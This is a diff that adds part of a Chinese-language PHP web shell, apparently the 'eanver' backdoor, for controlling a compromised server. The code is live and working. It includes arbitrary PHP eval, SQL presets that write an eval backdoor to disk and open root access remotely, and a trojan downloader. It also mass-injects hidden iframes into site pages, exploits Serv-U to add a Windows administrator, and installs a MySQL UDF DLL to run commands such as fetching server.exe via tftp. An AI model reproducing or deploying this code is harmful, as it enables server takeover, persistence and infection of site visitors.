+<br><br>上传路径 <input type="text" name="uppath" value="{$uppath}" style="width:500px">
+<br><br>选择文件 <input type="file" name="upfile" style="width:500px;height:22px;">
+</div><div class="actall"><input type="submit" value="上传" style="width:80px;">
+END;
+}
+elseif($o == 'd')
+{
+print<<<END
+<br><br><br>下载文件 <input type="text" name="downfile" value="{$downfile}" style="width:500px">
+</div><div class="actall"><input type="submit" value="下载" style="width:80px;">
+END;
+}
+else
+{
+	if(!empty($_POST['msql']))
+	{
+		$msql = $_POST['msql'];
+		if($result = @mysql_query($msql,$conn))
+		{
+			$MSG_BOX = '执行SQL语句成功<br>';
+			$k = 0;
+			while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
+		}
+		else $MSG_BOX .= mysql_error();
+	}
+print<<<END
+<script language="javascript">
+function nFull(i){
+	Str = new Array(11);
+	Str[0] = "select version();";
+	Str[1] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile 'D:/web/iis.txt'";
+	Str[2] = "select '<?php eval(\$_POST[cmd]);?>' into outfile 'F:/web/bak.php';";
+	Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";
+	nform.msql.value = Str[i];
+	return true;
+}
+</script>
+<textarea name="msql" style="width:700px;height:200px;">{$msql}</textarea></div>
+<div class="actall">
+<select onchange="return nFull(options[selectedIndex].value)">
+	<option value="0" selected>显示版本</option>
+	<option value="1">导出文件</option>
+	<option value="2">写入文件</option>
+	<option value="3">开启外连</option>
+</select>
+<input type="submit" value="执行" style="width:80px;">
+END;
+}
+	if($MSG_BOX != '') echo '</div><div class="actall">'.$MSG_BOX.'</div></center></form>';
+	else echo '</div></center></form>';
+	break;
+	
+    case "downloader":
+	$Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe';
+	$Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe');
+print<<<END
+	<form method="POST">
+    <div class="actall">超连接 <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>
+    <div class="actall">下载到 <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>
+    <div class="actall"><input value="下载" type="submit" style="width:80px;"></div></form>
+END;
+	if((!empty($_POST['durl'])) && (!empty($_POST['dpath'])))
+	{
+		echo '<div class="actall">';
+		$contents = @file_get_contents($_POST['durl']);
+		if(!$contents) echo '无法读取要下载的数据';
+		else echo File_Write($_POST['dpath'],$contents,'wb') ? '下载文件成功' : '下载文件失败';
+		echo '</div>';
+	}
+	break;
+
+	case "issql":
+	session_start();
+  if($_POST['sqluser'] && $_POST['sqlpass']){
+    $_SESSION['sql_user'] = $_POST['sqluser'];
+    $_SESSION['sql_password'] = $_POST['sqlpass'];
+  }
+  if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];}
+  else{$_SESSION['sql_host'] = 'localhost';}
+  if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];}
+  else{$_SESSION['sql_port'] = '3306';}
+  if($_SESSION['sql_user'] && $_SESSION['sql_password']){
+    if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){
+      unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
+      die(html_a('?eanver=sqlshell','连接失败请返回'));
+    }
+  }
+  else{
+    die(html_a('?eanver=sqlshell','连接失败请返回'));
+  }
+  $query = mysql_query("SHOW DATABASES",$sqlcon);
+  html_n('<tr><td>数据库列表:');
+  while($db = mysql_fetch_array($query)) {
+		html_a('?eanver=issql&db='.$db['Database'],$db['Database']);
+		echo '&nbsp;&nbsp;';
+	}
+  html_n('</td></tr>');
+  if($_GET['db']){
+  	css_js("3");
+    mysql_select_db($_GET['db'], $sqlcon);
+    html_n('<tr><td><form method="POST" name="DbForm"><textarea name="sql" COLS="80" ROWS="3">'.$_POST['sql'].'</textarea><br>');
+    html_select(array(0=>"--SQL语法--",7=>"添加数据",8=>"删除数据",9=>"修改数据",10=>"建数据表",11=>"删数据表",12=>"添加字段",13=>"删除字段"),0,"onchange='return Full(options[selectedIndex].value)'");
+    html_input("submit","doquery","执行");
+    html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']);
+    html_n('--->');
+    html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']);
+    html_n('</form><br>');
+  	if(!empty($_POST['sql'])){
+			if (@mysql_query($_POST['sql'],$sqlcon)) {
+				echo "执行SQL语句成功";
+			}else{
+				echo "出错: ".mysql_error();
+			}
+  	}
+    if($_GET['table']){
+      html_n('<table border=1><tr>');
+      $query = "SHOW COLUMNS FROM ".$_GET['table'];
+      $result = mysql_query($query,$sqlcon);
+      $fields = array();
+      while($row = mysql_fetch_assoc($result)){
+        array_push($fields,$row['Field']);
+        html_n('<td><font color=#FFFF44>'.$row['Field'].'</font></td>');
+      }
+      html_n('</tr><tr>');
+      $result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error());
+      while($text = @mysql_fetch_assoc($result)){
+      	foreach($fields as $row){
+      		if($text[$row] == "") $text[$row] = 'NULL';
+      		html_n('<td>'.$text[$row].'</td>');
+      	}
+      	echo '</tr>';
+      }
+    }
+    else{
+      $query = "SHOW TABLES FROM " . $_GET['db'];
+      $dat = mysql_query($query, $sqlcon) or die(mysql_error());
+      while ($row = mysql_fetch_row($dat)){
+        html_n("<tr><td><a href='?eanver=issql&db=".$_GET['db']."&table=".$row[0]."'>".$row[0]."</a></td></tr>");
+      }
+    }
+  }
+	break;
+	
+	case "upfiles":
+	html_n('<tr><td>服务器限制上传单个文件大小: '.@get_cfg_var('upload_max_filesize').'<form method="POST" enctype="multipart/form-data">');
+	html_input("text","uppath",root_dir,"<br>上传到路径: ","51");
+print<<<END
+<SCRIPT language="JavaScript">
+function addTank(){
+var k=0;
+  k=k+1;
+  k=tank.rows.length;
+  newRow=document.all.tank.insertRow(-1)
+  <!--删除选择-->
+  newcell=newRow.insertCell()
+  newcell.innerHTML="<input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'>"
+}
+
+function delTank() {
+  if(tank.rows.length==1) return;
+  var checkit = false;
+  for (var i=0;i<document.all.tankNo.length;i++) {
+    if (document.all.tankNo[i].checked) {
+      checkit=true;
+      tank.deleteRow(i+1);
+      i--;
+    }
+  }
+  if (checkit) {
+  } else{
+    alert("请选择一个要删除的对象");
+    return false;
+  }
+}
+</SCRIPT>
+<br><br>
+<table cellSpacing=0 cellPadding=0 width="100%" border=0>       
+          <tr>
+            <td width="7%"><input class="button01" type="button"  onclick="addTank()" value=" 添 加 " name="button2"/>
+            <input name="button3"  type="button" class="button01" onClick="delTank()" value="删除" />
+            </td>
+          </tr>
+</table>
+<table  id="tank" width="100%" border="0" cellpadding="1" cellspacing="1" >
+<tr><td>请选择要上传的文件：</td></tr>
+<tr><td><input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'></td></tr>
+</table>
+END;
+	html_n('<br><input type="submit" name="upfiles" value="上传" style="width:80px;"> <input type="button" value="返回" onclick="window.location=\'?eanver=main&path='.root_dir.'\';" style="width:80px;">');
+	if($_POST['upfiles']){
+		foreach ($_FILES["upfile"]["error"] as $key => $error){
+			if ($error == UPLOAD_ERR_OK){
+				$tmp_name = $_FILES["upfile"]["tmp_name"][$key];
+				$name = $_FILES["upfile"]["name"][$key];
+				$uploadfile = str_path($_POST['uppath'].'/'.$name);
+				$upload = @copy($tmp_name,$uploadfile) ? $name.$msg[2] : @move_uploaded_file($tmp_name,$uploadfile) ? $name.$msg[2] : $name.$msg[3];
+				echo '<br><br>'.$upload;
+			}
+		}
+	}
+	html_n('</form>');
+	break;
+	
+	case "guama":
+	$patht = isset($_POST['path']) ? $_POST['path'] : root_dir;
+	$typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx";
+	$codet = isset($_POST['code']) ? $_POST['code'] : "<iframe src=\"http://localhost/eanver.htm\" width=\"1\" height=\"1\"></iframe>";
+	html_n('<tr><td>文件类型请用"|"隔开,也可以是指定文件名.<form method="POST"><br>');
+	html_input("text","path",$patht,"路径范围","45");
+	html_input("checkbox","pass","","使用目录遍历","",true);
+	html_input("text","type",$typet,"<br><br>文件类型","60");
+	html_text("code","67","5",$codet);
+	html_n('<br><br>');
+	html_radio("批量挂马","批量清马","guama","qingma");
+	html_input("submit","passreturn","开始");
+	html_n('</td></tr></form>');
+	if(!empty($_POST['path'])){
+		html_n('<tr><td>目标文件:<br><br>');
+		if(isset($_POST['pass'])) $bool = true; else $bool = false;
+		do_passreturn($patht,$codet,$_POST['return'],$bool,$typet);
+	}
+	break;
+	
+	case "tihuan":
+	html_n('<tr><td>此功能可批量替换文件内容,请小心使用.<br><br><form method="POST">');
+	html_input("text","path",root_dir,"路径范围","45");
+	html_input("checkbox","pass","","使用目录遍历","",true);
+	html_text("newcode","67","5",$_POST['newcode']);
+	html_n('<br><br>替换为');
+	html_text("oldcode","67","5",$_POST['oldcode']);
+	html_input("submit","passreturn","替换","<br><br>");
+	html_n('</td></tr></form>');
+	if(!empty($_POST['path'])){
+		html_n('<tr><td>目标文件:<br><br>');
+		if(isset($_POST['pass'])) $bool = true; else $bool = false;
+		do_passreturn($_POST['path'],$_POST['newcode'],"tihuan",$bool,$_POST['oldcode']);
+	}
+	break;
+	
+	case "scanfile":
+	css_js("4");
+	html_n('<tr><td>此功能可很方便的搜索到保存MYSQL用户密码的配置文件,用于提权.<br>当服务器文件太多时,会影响执行速度,不建议使用目录遍历.<form method="POST" name="sform"><br>');
+	html_input("text","path",root_dir,"路径名","45");
+	html_input("checkbox","pass","","使用目录遍历","",true);
+	html_input("text","code",$_POST['code'],"<br><br>关键字","40");
+	html_select(array("--MYSQL配置文件--","Discuz","PHPWind","phpcms","dedecms","PHPBB","wordpress","sa-blog","o-blog"),0,"onchange='return Fulll(options[selectedIndex].value)'");
+	html_n('<br><br>');
+	html_radio("搜索文件名","搜索包含文字","scanfile","scancode");
+	html_input("submit","passreturn","搜索");
+	html_n('</td></tr></form>');
+	if(!empty($_POST['path'])){
+		html_n('<tr><td>找到文件:<br><br>');
+		if(isset($_POST['pass'])) $bool = true; else $bool = false;
+		do_passreturn($_POST['path'],$_POST['code'],$_POST['return'],$bool);
+	}
+	break;
+	
+	case "scanphp":
+	html_n('<tr><td>原理是根据特征码定义的,请查看代码判断后再进行删除.<form method="POST"><br>');
+	html_input("text","path",root_dir,"查找范围","40");
+	html_input("checkbox","pass","","使用目录遍历<br><br>脚本类型","",true);
+	html_select(array("php" => "PHP","asp" => "ASP","aspx" => "ASPX","jsp" => "JSP"));
+	html_input("submit","passreturn","查找","<br><br>");
+	html_n('</td></tr></form>');
+	if(!empty($_POST['path'])){
+		html_n('<tr><td>找到文件:<br><br>');
+		if(isset($_POST['pass'])) $bool = true; else $bool = false;
+		do_passreturn($_POST['path'],$_POST['class'],"scanphp",$bool);
+	}
+	break;
+	
+	case "port":
+	$Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1';
+	$Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|43958|5631';
+print<<<END
+<form method="POST">
+<div class="actall">扫描IP <input type="text" name="ip" value="{$Port_ip}" style="width:600px;"> </div>
+<div class="actall">端口号 <input type="text" name="port" value="{$Port_port}" style="width:597px;"></div>
+<div class="actall"><input type="submit" value="扫描" style="width:80px;"></div>
+</form>
+END;
+	if((!empty($_POST['ip'])) && (!empty($_POST['port'])))
+	{
+		echo '<div class="actall">';
+		$ports = explode('|', $_POST['port']);
+		for($i = 0;$i < count($ports);$i++)
+		{
+			$fp = @fsockopen($_POST['ip'],$ports[$i],$errno,$errstr,2);
+			echo $fp ? '<font color="#FF0000">开放端口 ---> '.$ports[$i].'</font><br>' : '关闭端口 ---> '.$ports[$i].'<br>';
+			ob_flush();
+			flush();
+		}
+		echo '</div>';
+	}
+	break;
+	
+
+	case "getcode":
+if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>获取 URL 内容失败</b></p></center></body>";exit;}
+print<<<END
+<table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
+ <form method="POST" target="proxyframe">
+  <tr class="firstalt">
+	<td align="center"><b>在线代理</b></td>
+  </tr>
+  <tr class="secondalt">
+	<td align="center"  ><br><ul><li>用本功能仅实现简单的 HTTP 代理,不会显示使用相对路径的图片、链接及CSS样式表.</li><li>用本功能可以通过本服务器浏览目标URL,但不支持 SQL Injection 探测以及某些特殊字符.</li><li>用本功能浏览的 URL,在目标主机上留下的IP记录是 : {$_SERVER['SERVER_NAME']}</li></ul></td>
+  </tr>
+  <tr class="firstalt">
+	<td align="center" height=40  >URL: <input name="url" value="about:blank" type="text"  class="input" size="100" >
+ <input name="" value="浏览" type="submit"  class="input" size="30" >
+</td>
+  </tr>
+  <tr class="secondalt">
+	<td align="center"  ><iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="about:blank"></iframe></td>
+  </tr>
+</form></table>
+END;
+	break;
+	
+	case "servu":
+	$SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P';
+print<<<END
+<div class="actall"><a href="?eanver=servu">[执行命令]</a> <a href="?eanver=servu&o=adduser">[添加用户]</a></div>
+<form method="POST">
+	<div class="actall">ServU端口 <input name="SUPort" type="text" value="43958" style="width:300px"></div>
+	<div class="actall">ServU用户 <input name="SUUser" type="text" value="LocalAdministrator" style="width:300px"></div>
+	<div class="actall">ServU密码 <input name="SUPass" type="text" value="{$SUPass}" style="width:300px"></div>
+END;
+if($_GET['o'] == 'adduser')
+{
+print<<<END
+<div class="actall">帐号 <input name="user" type="text" value="envl" style="width:200px">
+密码 <input name="password" type="text" value="envl" style="width:200px">
+目录 <input name="part" type="text" value="C:\\\\" style="width:200px"></div>
+END;
+}
+else
+{
+print<<<END
+<div class="actall">提权命令 <input name="SUCommand" type="text" value="net user envl envl /add & net localgroup administrators envl /add" style="width:600px"><br>
+<input name="user" type="hidden" value="envl">
+<input name="password" type="hidden" value="envl">
+<input name="part" type="hidden" value="C:\\\\"></div>
+END;
+}
+echo '<div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form>';
+	if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass'])))
+	{
+		echo '<div class="actall">';
+		$sendbuf = "";
+		$recvbuf = "";
+		$domain  = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n";
+		$adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n".
+							 "-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n".
+							 "-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n";
+		$deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n";
+		$sock = @fsockopen("127.0.0.1", $_POST["SUPort"],$errno,$errstr, 10);
+		$recvbuf = @fgets($sock, 1024);
+		echo "返回数据包: $recvbuf <br>";
+		$sendbuf = "USER ".$_POST["SUUser"]."\r\n";
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "发送数据包: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "返回数据包: $recvbuf <br>";
+		$sendbuf = "PASS ".$_POST["SUPass"]."\r\n";
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "发送数据包: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "返回数据包: $recvbuf <br>";
+		$sendbuf = "SITE MAINTENANCE\r\n";
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "发送数据包: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "返回数据包: $recvbuf <br>";
+		$sendbuf = $domain;
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "发送数据包: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "返回数据包: $recvbuf <br>";
+		$sendbuf = $adduser;
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "发送数据包: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "返回数据包: $recvbuf <br>";
+		if(!empty($_POST['SUCommand']))
+		{
+	 		$exp = @fsockopen("127.0.0.1", "21",$errno,$errstr, 10);
+	 		$recvbuf = @fgets($exp, 1024);
+	 		echo "返回数据包: $recvbuf <br>";
+	 		$sendbuf = "USER ".$_POST['user']."\r\n";
+	 		@fputs($exp, $sendbuf, strlen($sendbuf));
+	 		echo "发送数据包: $sendbuf <br>";
+	 		$recvbuf = @fgets($exp, 1024);
+	 		echo "返回数据包: $recvbuf <br>";
+	 		$sendbuf = "PASS ".$_POST['password']."\r\n";
+	 		@fputs($exp, $sendbuf, strlen($sendbuf));
+	 		echo "发送数据包: $sendbuf <br>";
+	 		$recvbuf = @fgets($exp, 1024);
+	 		echo "返回数据包: $recvbuf <br>";
+	 		$sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";
+	 		@fputs($exp, $sendbuf, strlen($sendbuf));
+	 		echo "发送数据包: site exec <font color=#006600>".$_POST["SUCommand"]."</font> <br>";
+	 		$recvbuf = @fgets($exp, 1024);
+	 		echo "返回数据包: $recvbuf <br>";
+	 		$sendbuf = $deldomain;
+	 		@fputs($sock, $sendbuf, strlen($sendbuf));
+	 		echo "发送数据包: $sendbuf <br>";
+	 		$recvbuf = @fgets($sock, 1024);
+	 		echo "返回数据包: $recvbuf <br>";
+	 		@fclose($exp);
+		}
+		@fclose($sock);
+		echo '</div>';
+	}
+	break;
+	
+	case "eval":
+	$phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();";
+	html_n('<tr><td><form method="POST">不用写&lt;? ?&gt;标签');
+	html_text("phpcode","70","15",$phpcode);
+	html_input("submit","eval","执行","<br><br>");
+	if(!empty($_POST['eval'])){
+	echo "<br><br>";
+    eval(stripslashes($phpcode));
+	}
+	html_n('</form>');
+	break;
+
+	case "myexp":
+	$MSG_BOX = '请先导出DLL,再执行命令.MYSQL用户必须为root权限,导出路径必须能加载DLL文件.';
+	$info = '命令回显';
+	$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $mpath = 'C:/windows/mysqlDll.dll'; $sqlcmd = 'ver';
+	if(isset($_POST['mhost']) && isset($_POST['muser']))
+	{
+		$mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; $mpath = File_Str($_POST['mpath']); $sqlcmd = $_POST['sqlcmd'];
+		$conn = mysql_connect($mhost.':'.$mport,$muser,$mpass);
+		if($conn)
+		{
+			@mysql_select_db($mdata);
+			if((!empty($_POST['outdll'])) && (!empty($_POST['mpath'])))
+			{
+				$query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";
+				if(@mysql_query($query,$conn))
+				{
+					$shellcode = Mysql_shellcode();
+					$query = "INSERT into Envl_Temp_Tab values (CONVERT(".$shellcode.",CHAR));";
+					if(@mysql_query($query,$conn))
+					{
+						$query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \''.$mpath.'\';';
+						if(@mysql_query($query,$conn))
+						{
+							$ap = explode('/', $mpath); $inpath = array_pop($ap);
+							$query = 'Create Function state returns string soname \''.$inpath.'\';';
+							$MSG_BOX = @mysql_query($query,$conn) ? '安装DLL成功' : '安装DLL失败';
+						}
+						else $MSG_BOX = '导出DLL文件失败';
+					}
+					else $MSG_BOX = '写入临时表失败';
+					@mysql_query('DROP TABLE Envl_Temp_Tab;',$conn);
+				}
+				else $MSG_BOX = '创建临时表失败';
+			}
+			if(!empty($_POST['runcmd']))
+			{
+				$query = 'select state("'.$sqlcmd.'");';
+				$result = @mysql_query($query,$conn);
+				if($result)
+				{
+					$k = 0; $info = NULL;
+					while($row = @mysql_fetch_array($result)){$infotmp .= $row[$k];$k++;}
+					$info = $infotmp;
+					$MSG_BOX = '执行成功';
+				}
+				else $MSG_BOX = '执行失败';
+			}
+		}
+		else $MSG_BOX = '连接MYSQL失败';
+	}
+print<<<END
+<script language="javascript">
+function Fullm(i){
+	Str = new Array(11);
+	Str[0] = "ver";
+	Str[1] = "net user envl envl /add";
+	Str[2] = "net localgroup administrators envl /add";
+	Str[3] = "net start Terminal Services";
+	Str[4] = "tasklist /svc";
+	Str[5] = "netstat -ano";
+	Str[6] = "ipconfig";
+	Str[7] = "net user guest /active:yes";
+	Str[8] = "copy c:\\\\1.php d:\\\\2.php";
+	Str[9] = "tftp -i 219.134.46.245 get server.exe c:\\\\server.exe";
+	Str[10] = "net start telnet";
+	Str[11] = "shutdown -r -t 0";
+	mform.sqlcmd.value = Str[i];
+	return true;
+}
+</script>
+<form id="mform" method="POST">
+<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
+<center><div class="actall">
+地址 <input type="text" name="mhost" value="{$mhost}" style="width:110px">
+端口 <input type="text" name="mport" value="{$mport}" style="width:110px">
+用户 <input type="text" name="muser" value="{$muser}" style="width:110px">
+密码 <input type="text" name="mpass" value="{$mpass}" style="width:110px">
+库名 <input type="text" name="mdata" value="{$mdata}" style="width:110px">
+</div><div class="actall">
+可加载路径 <input type="text" name="mpath" value="{$mpath}" style="width:555px"> 
+<input type="submit" name="outdll" value="安装DLL" style="width:80px;"></div>
+<div class="actall">安装成功后可用 <br><input type="text" name="sqlcmd" value="{$sqlcmd}" style="width:515px;">
+<select onchange="return Fullm(options[selectedIndex].value)">
+<option value="0" selected>--命令集合--</option>
+<option value="1">添加管理员</option>
+<option value="2">设为管理组</option>
+<option value="3">开启远程桌面</option>
+<option value="4">查看进程和PID</option>
+<option value="5">查看端口和PID</option>
+<option value="6">查看IP</option>
+<option value="7">激活guest帐户</option>
+<option value="8">复制文件</option>
+<option value="9">ftp下载</option>
+<option value="10">开启telnet</option>
+<option value="11">重启</option>
+</select>
+<input type="submit" name="runcmd" value="执行" style="width:80px;">
+<textarea style="width:720px;height:300px;">{$info}</textarea>
+</div></center>
+</form>
+END;
+	break;
+	
+
+	case "mysql_exec":
+  if(isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass']))
+  {
+  	if(@mysql_connect($_POST['mhost'].':'.$_POST['mport'],$_POST['muser'],$_POST['mpass']))
+	  {
+	  	$cookietime = time() + 24 * 3600;
+	  	setcookie('m_eanverhost',$_POST['mhost'],$cookietime);
+	  	setcookie('m_eanverport',$_POST['mport'],$cookietime);
+	  	setcookie('m_eanveruser',$_POST['muser'],$cookietime);
+	  	setcookie('m_eanverpass',$_POST['mpass'],$cookietime);
+	  	die('正在登陆,请稍候...<meta http-equiv="refresh" content="0;URL=?eanver=mysql_msg">');
+	  }
+  }
+print<<<END
+<form method="POST" name="oform" id="oform">
+<div class="actall">地址 <input type="text" name="mhost" value="localhost" style="width:300px"></div>
+<div class="actall">端口 <input type="text" name="mport" value="3306" style="width:300px"></div>
+<div class="actall">用户 <input type="text" name="muser" value="root" style="width:300px"></div>
+<div class="actall">密码 <input type="text" name="mpass" value="" style="width:300px"></div>
+<div class="actall"><input type="submit" value="登陆" style="width:80px;"> <input type="button" value="COOKIE" style="width:80px;" onclick="window.location='?eanver=mysql_msg';"></div>
+</form>
+END;
+break;
+
+case "mysql_msg":
+	$conn = @mysql_connect($_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'],$_COOKIE['m_eanveruser'],$_COOKIE['m_eanverpass']);
+	if($conn)
+	{
+print<<<END
+<script language="javascript">
+function Delok(msg,gourl)
+{
+	smsg = "确定要删除[" + unescape(msg) + "]吗?";
+	if(confirm(smsg)){window.location = gourl;}
+}
+function Createok(ac)
+{
+	if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (eanver BLOB);';
+	if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;';
+	if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;';
+	return false;
+}
+</script>
+END;
+		$BOOL = false;
+		$MSG_BOX = '用户:'.$_COOKIE['m_eanveruser'].' &nbsp;&nbsp;&nbsp;&nbsp; 地址:'.$_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'].' &nbsp;&nbsp;&nbsp;&nbsp; 版本:';
+		$k = 0;
+		$result = @mysql_query('select version();',$conn);
+		while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
+		echo '<div class="actall"> 数据库:';
+		$result = mysql_query("SHOW DATABASES",$conn);
+		while($db = mysql_fetch_array($result)){echo '&nbsp;&nbsp;[<a href="?eanver=mysql_msg&db='.$db['Database'].'">'.$db['Database'].'</a>]';}
+		echo '</div>';
+		if(isset($_GET['db']))
+		{
+			mysql_select_db($_GET['db'],$conn);
+			if(!empty($_POST['nsql'])){$BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? '执行成功' : '执行失败 '.mysql_error();}
+			if(is_array($_POST['insql']))
+			{
+				$query = 'INSERT INTO '.$_GET['table'].' (';
+				foreach($_POST['insql'] as $var => $key)
+				{
+					$querya .= $var.',';
+					$queryb .= '\''.addslashes($key).'\',';
+				}
+				$query = $query.substr($querya, 0, -1).') VALUES ('.substr($queryb, 0, -1).');';
+				$MSG_BOX = mysql_query($query,$conn) ? '添加成功' : '添加失败 '.mysql_error();
+			}
+			if(is_array($_POST['upsql']))
+			{
+				$query = 'UPDATE '.$_GET['table'].' SET ';
+				foreach($_POST['upsql'] as $var => $key)
+				{
+					$queryb .= $var.'=\''.addslashes($key).'\',';
+				}
+				$query = $query.substr($queryb, 0, -1).' '.base64_decode($_POST['wherevar']).';';
+				$MSG_BOX = mysql_query($query,$conn) ? '修改成功' : '修改失败 '.mysql_error();
+			}
+			if(isset($_GET['del']))
+			{
+				$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['del'].', 1;',$conn);
+				$good = mysql_fetch_assoc($result);
+				$query = 'DELETE FROM '.$_GET['table'].' WHERE ';
+				foreach($good as $var => $key){$queryc .= $var.'=\''.addslashes($key).'\' AND ';}
+				$where = $query.substr($queryc, 0, -4).';';
+				$MSG_BOX = mysql_query($where,$conn) ? '删除成功' : '删除失败 '.mysql_error();
+			}
+			$action = '?eanver=mysql_msg&db='.$_GET['db'];
+			if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? '删除成功' : '删除失败 '.mysql_error();}
+			if(isset($_GET['table'])){$action .= '&table='.$_GET['table'];if(isset($_GET['edit'])) $action .= '&edit='.$_GET['edit'];}
+			if(isset($_GET['insert'])) $action .= '&insert='.$_GET['insert'];
+			echo '<div class="actall"><form method="POST" action="'.$action.'">';
+			echo '<textarea name="nsql" id="nsql" style="width:500px;height:50px;">'.$_POST['nsql'].'</textarea> ';
+			echo '<input type="submit" name="querysql" value="执行" style="width:60px;height:49px;"> ';
+			echo '<input type="button" value="创建表" style="width:60px;height:49px;" onclick="Createok(\'a\')"> ';
+			echo '<input type="button" value="创建库" style="width:60px;height:49px;" onclick="Createok(\'b\')"> ';
+			echo '<input type="button" value="删除库" style="width:60px;height:49px;" onclick="Createok(\'c\')"></form></div>';
+			echo '<div class="msgbox" style="height:40px;">'.$MSG_BOX.'</div><div class="actall"><a href="?eanver=mysql_msg&db='.$_GET['db'].'">'.$_GET['db'].'</a> ---> ';
+			if(isset($_GET['table']))
+			{
+				echo '<a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'">'.$_GET['table'].'</a> ';
+				echo '[<a href="?eanver=mysql_msg&db='.$_GET['db'].'&insert='.$_GET['table'].'">插入</a>]</div>';
+				if(isset($_GET['edit']))
+				{
+					if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table'];
+					echo '<form method="POST" action="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$atable.'">';
+					$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['edit'].', 1;',$conn);
+					$good = mysql_fetch_assoc($result);
+					$u = 0;
+					foreach($good as $var => $key)
+					{
+						$queryc .= $var.'=\''.$key.'\' AND ';
+						$type = @mysql_field_type($result, $u);
+						$len = @mysql_field_len($result, $u);
